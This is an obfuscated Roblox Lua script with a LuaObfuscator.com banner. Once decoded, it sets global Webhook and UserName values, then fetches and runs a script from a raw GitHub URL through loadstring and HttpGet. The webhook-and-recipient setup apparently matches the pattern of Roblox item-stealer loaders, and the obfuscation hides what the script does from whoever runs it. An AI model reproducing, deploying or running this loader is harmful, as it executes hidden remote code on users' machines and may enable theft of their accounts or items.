--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v70=0 -0 ;local v71;while true do if (v70==0) then v71=(v31/(2^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((2257 -(1523 + 114)) -(555 + 64)))) + (932 -(857 + 74)))) ;return v71-(v71%(569 -(367 + 201))) ;end end else local v72=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v72 + v72))>=v72) and (1 + 0 + 0)) or (877 -(282 + 595)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 );v19=v19 + (5 -1) ;return (v37 * 16777216) + (v36 * (66601 -(68 + 997))) + (v35 * ((6644 -5118) -(226 + 1044))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 + 0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38~=(451 -(10 + 438))) then else v45=nil;while true do local v77=0 + 0 ;while true do if (v77==(3 -2)) then if (v39==3) then local v101=0 + 0 ;local v102;while true do if (v101~=(1180 -(1123 + 57))) then else v102=0 + 0 ;while true do if (v102==0) then for v156=255 -(163 + 91) ,v24() do v41[v156-1 ]=v29();end return v43;end end break;end end end if (v39==(1932 -(1869 + 61))) then for v104=1 + 0 ,v44 do local v105=0 -0 ;local v106;local v107;local v108;while true do if (v105~=0) then else v106=0;v107=nil;v105=1 -0 ;end if (v105==1) then v108=nil;while true do if ((1 + 0)==v106) then if (v107==1) then v108=v22()~=(0 -0) ;elseif (v107==(2 + 0)) then v108=v25();elseif (v107==3) then v108=v26();end v45[v104]=v108;break;end if (v106==(1474 -(1329 + 145))) then local v159=971 -(140 + 831) ;local v160;local v161;while true do if (v159~=0) then else v160=1850 -(1409 + 441) ;v161=nil;v159=719 -(15 + 703) ;end if (v159~=1) then else while true do if (v160~=(0 + 0)) then else v161=438 -(262 + 176) ;while true do if (v161~=0) then else local v182=1721 -(345 + 1376) ;while true do if ((688 -(198 + 490))==v182) then v107=v22();v108=nil;v182=1;end if (v182~=1) then else v161=1;break;end end end if (v161==(4 -3)) then v106=1;break;end end break;end end break;end end end end break;end end end v43[3]=v22();for v109=1,v24() do local v110=0 -0 ;local v111;local v112;local v113;while true do if (v110==(1207 -(696 + 510))) then v113=nil;while true do if (0==v111) then v112=0;v113=nil;v111=1;end if (v111~=1) then else while true do if (v112~=0) then else v113=v22();if (v21(v113,1,1)==(0 -0)) then local v174=1262 -(1091 + 171) ;local v175;local v176;local v177;local v178;local v179;while true do if (0~=v174) then else v175=0;v176=nil;v174=1;end if (v174==(1 + 1)) then v179=nil;while true do if (v175~=(0 -0)) then else local v183=0;while true do if ((0 -0)==v183) then v176=0;v177=nil;v183=375 -(123 + 251) ;end if (v183==(4 -3)) then v175=1;break;end end end if (v175==2) then while true do if (v176==2) then local v186=698 -(208 + 490) ;local v187;while true do if (v186==0) then v187=0 + 0 ;while true do if (v187==1) then v176=2 + 1 ;break;end if (v187~=(836 -(660 + 176))) then else local v195=0;while true do if (v195~=(1 + 0)) then else v187=1;break;end if (v195~=(202 -(14 + 188))) then else local v198=0;while true do if (v198~=0) then else if (v21(v178,1,676 -(534 + 141) )==1) then v179[1 + 1 ]=v45[v179[2]];end if (v21(v178,2,2 + 0 )==(1 + 0)) then v179[3]=v45[v179[3]];end v198=1 -0 ;end if (v198==(1 -0)) then v195=2 -1 ;break;end end end end end end break;end end end if (v176~=1) then else local v188=0;local v189;while true do if (v188==0) then v189=0 + 0 ;while true do if (v189~=1) then else v176=2;break;end if (v189==0) then local v196=0;while true do if (v196~=(1 + 0)) then else v189=1;break;end if (v196==(396 -(115 + 281))) then v179={v23(),v23(),nil,nil};if (v177==0) then local v199=0;local v200;while true do if ((0 -0)~=v199) then else v200=867 -(550 + 317) ;while true do if (v200~=(0 -0)) then else v179[3 -0 ]=v23();v179[4]=v23();break;end end break;end end elseif (v177==1) then v179[3]=v24();elseif (v177==2) then v179[3]=v24() -((5 -3)^16) ;elseif (v177==3) then local v209=285 -(134 + 151) ;local v210;local v211;while true do if (v209==1) then while true do if (0==v210) then v211=1665 -(970 + 695) ;while true do if (v211==0) then v179[3]=v24() -((3 -1)^(2006 -(582 + 1408))) ;v179[13 -9 ]=v23();break;end end break;end end break;end if (v209==0) then v210=0;v211=nil;v209=1 -0 ;end end end v196=3 -2 ;end end end end break;end end end if (v176==0) then local v190=0;local v191;while true do if (v190~=(1824 -(1195 + 629))) then else v191=0;while true do if ((0 -0)==v191) then local v197=0;while true do if (v197==(241 -(187 + 54))) then v177=v21(v113,782 -(162 + 618) ,3 + 0 );v178=v21(v113,4,4 + 2 );v197=1;end if (v197==(1 -0)) then v191=1;break;end end end if (v191~=(1 -0)) then else v176=1;break;end end break;end end end if (v176~=(1 + 2)) then else if (v21(v178,1639 -(1373 + 263) ,3)==1) then v179[4]=v45[v179[4]];end v40[v109]=v179;break;end end break;end if ((1001 -(451 + 549))==v175) then local v184=0;local v185;while true do if (v184~=0) then else v185=0;while true do if (v185==0) then v178=nil;v179=nil;v185=1;end if (v185~=1) then else v175=1 + 1 ;break;end end break;end end end end break;end if ((1 -0)==v174) then v177=nil;v178=nil;v174=2 -0 ;end end end break;end end break;end end break;end if (v110==(1384 -(746 + 638))) then v111=0 + 0 ;v112=nil;v110=1 -0 ;end end end v39=344 -(218 + 123) ;end break;end if (v77~=(1581 -(1535 + 46))) then else local v96=0 + 0 ;while true do if (v96==1) then v77=1 + 0 ;break;end if (v96~=0) then else if (v39==0) then v40={};v41={};v42={};v39=561 -(306 + 254) ;end if (v39==1) then v43={v40,v41,nil,v42};v44=v24();v45={};v39=2 + 0 ;end v96=2 -1 ;end end end end end break;end if (v38==(603 -(268 + 335))) then v39=290 -(60 + 230) ;v40=nil;v38=1;end if (2==v38) then v43=nil;v44=nil;v38=3;end if (v38==(573 -(426 + 146))) then v41=nil;v42=nil;v38=1 + 1 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=1456 -(282 + 1174) ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if ((813 -(569 + 242))==v46) then v51=v21(v48,(144 -84) -39 ,2 + (82 -53) );v52=((v21(v48,1056 -(706 + 318) )==((3152 -(106 + 1794)) -(721 + 530))) and  -1) or (1272 -(945 + 326)) ;v46=7 -4 ;end if (v46==(1 + 0)) then v49=701 -(271 + 136 + 293) ;v50=(v21(v48,1 + 0 ,1520 -(1408 + 92) ) * ((1088 -(461 + 625))^(1320 -(993 + 295)))) + v47 ;v46=1 + 1 ;end if (v46==(1174 -(418 + 753))) then if (v51==0) then if (v50==(0 + 0 + 0)) then return v52 * ((0 -0) + 0) ;else v51=1 + 0 ;v49=0 + 0 ;end elseif (v51==(2576 -((1099 -693) + 123))) then return ((v50==0) and (v52 * ((1770 -(1749 + (134 -(4 + 110))))/0))) or (v52 * NaN) ;end return v8(v52,v51-(243 + (1364 -(57 + 527))) ) * (v49 + (v50/((1324 -(1249 + 73))^(19 + 33)))) ;end if (v46==0) then v47=v24();v48=v24();v46=1146 -((1893 -(41 + 1386)) + 679) ;end end end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(103 -(17 + 86))) then return "";end end v54=v3(v16,v19,(v19 + v53) -1 );v19=v19 + v53 ;local v55={};for v68=1 + 0 , #v54 do v55[v68]=v2(v1(v3(v54,v68,v68)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=0 -0 ;local v58;local v59;while true do if (v57==(2 -1)) then return (v59 * (422 -(122 + 44))) + v58 ;end if (v57==((0 + 0) -0)) then v58,v59=v1(v16,v19,v19 + 2 );v19=v19 + (6 -4) ;v57=1 + 0 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v73=v2(v0(v60,16));if v20 then local v78=v5(v73,v20);v20=nil;return v78;else return v73;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v79=v65;local v80=v66;local v81=v67;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=11) then if (v92<=5) then if (v92<=2) then if (v92<=0) then v89[v91[2]][v91[3]]=v91[4];elseif (v92==1) then local v134=v91[2];v89[v134]=v89[v134](v13(v89,v134 + 1 ,v84));else v89[v91[2]]=v63[v91[3]];end elseif (v92<=3) then for v129=v91[2],v91[3] do v89[v129]=nil;end elseif (v92>4) then v89[v91[2]][v91[3]]=v91[4];else v89[v91[2]]();end elseif (v92<=8) then if (v92<=6) then local v116=0;local v117;local v118;while true do if (v116==0) then v117=v91[2];v118=v89[v91[3]];v116=1;end if (v116==1) then v89[v117 + 1 ]=v118;v89[v117]=v118[v91[4]];break;end end elseif (v92>7) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92<=9) then local v119=v91[2];v89[v119]=v89[v119](v13(v89,v119 + 1 ,v84));elseif (v92>10) then v83=v91[3];else v89[v91[2]]=v91[3]~=0 ;end elseif (v92<=17) then if (v92<=14) then if (v92<=12) then v89[v91[2]]=v91[3];elseif (v92==13) then local v142=0;local v143;local v144;local v145;local v146;while true do if (v142==2) then for v172=v143,v84 do local v173=0;while true do if (v173==0) then v146=v146 + 1 ;v89[v172]=v144[v146];break;end end end break;end if (1==v142) then v84=(v145 + v143) -1 ;v146=0;v142=2;end if (v142==0) then v143=v91[2];v144,v145=v82(v89[v143](v13(v89,v143 + 1 ,v91[3])));v142=1;end end else v89[v91[2]]=v91[3];end elseif (v92<=15) then local v123=v91[2];local v124,v125=v82(v89[v123](v13(v89,v123 + 1 ,v91[3])));v84=(v125 + v123) -1 ;local v126=0;for v131=v123,v84 do v126=v126 + 1 ;v89[v131]=v124[v126];end elseif (v92==16) then for v167=v91[2],v91[3] do v89[v167]=nil;end else local v149=v91[2];local v150=v89[v91[3]];v89[v149 + 1 ]=v150;v89[v149]=v150[v91[4]];end elseif (v92<=20) then if (v92<=18) then v89[v91[2]]=v63[v91[3]];elseif (v92==19) then v89[v91[2]]=v91[3]~=0 ;else v83=v91[3];end elseif (v92<=21) then do return;end elseif (v92>22) then do return;end else v89[v91[2]]();end v83=v83 + 1 ;end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03013O0020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030E3O002O786E657665726B617A616E2O7803093O00557365724E616D653200253O00120E3O00014O0003000100013O0026073O0002000100010004143O0002000100120E000100013O00260700010012000100020004143O00120001001202000200033O003005000200040005001202000200063O001202000300073O00200600030003000800120E000500094O0013000600014O000F000300064O000100023O00022O00040002000100010004143O0024000100260700010005000100010004143O0005000100120E000200013O0026070002001C000100010004143O001C0001001202000300033O0030050003000A000B001202000300033O0030050003000C000B00120E000200023O00260700020015000100020004143O0015000100120E000100023O0004143O000500010004143O001500010004143O000500010004143O002400010004143O000200012O00173O00017O00",v9(),...);end
